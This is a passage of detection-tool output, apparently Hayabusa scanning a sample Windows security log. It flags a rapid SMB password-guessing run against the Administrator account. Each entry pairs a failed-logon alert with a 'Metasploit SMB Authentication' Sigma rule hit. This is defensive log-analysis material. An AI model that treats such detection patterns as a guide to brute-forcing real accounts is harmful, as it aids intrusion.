Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcPkVZSeg5VwChW8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.737 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aDLxt5gaFDTKsiVl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.778 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94JvBKdxJkawQQMT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KgBMk00K3iC1GQem : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XdGOj9Ybm6bcCo3p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: by6F4YKorxhp5ahn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.950 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1G6ZOgOaV6luDQN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.046 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qqSwNfvpPLQd6ZH1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.046 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.087 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mxtJJj54xSzHibHI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.087 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Y3yznfdaZ7dtwDO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esllFn4asbLxwkBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Pr0cgd6cF5ukhZ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.202 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pS2fabTrbl6rZ1NB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.249 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkylDDmUyuT57HdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.305 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Aqs8rSvuLAQuhfDp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KI07KTgBJc4kBSKY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Re3n3nJ8EEhRRT3G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BzspAC3z1csEn0Ve : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tpkb6bf42SLUst3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.505 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.546 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1F5d2wn60OgAExW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.546 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bhPNRHWhTyonDPuA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.642 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zEsnyWpUuHVBo6et : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.642 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I2FwaWy9TALkk9eU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.685 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fuikeQsxlOUVifVj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.778 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZWdsRJp9fHypPI1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B0j0IBX2eZnx99n9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YIZ5Knxg0xr0WmDb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.909 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wuej3f7mEoWmd4SX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.953 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.998 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B0LcCi06ilIhFPwb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.998 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jWsCGgoFmH06rRf4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.041 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bP47JjNKqtYIZPsC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mNlWZ9o0xf7bl2d0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.140 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hnPnB2lEN3BSDpXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.186 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dVMyeF9jGuzHkTHg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sDKLl3PjW2qrzJGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rkllnePSq3NQ5wgC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9qLWgQnR7P9cs7s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.359 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C1AdU07nzvv7RB2i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.408 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cHgiB5SMiQtsl5oD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.452 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 03e7QOn36l0jH35H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.499 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DoJBywV8x8cURwrO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.548 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.583 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SDYGYO6s6g6Dbx8r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.583 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nUqXpeTNePFyBmCo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.621 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T2h0qJWcbzRe1GSj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: edsfNOovOl1Ow503 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cxCC83XLMIJrNMvl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.740 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MzussOcg5ihdrnD0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.785 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 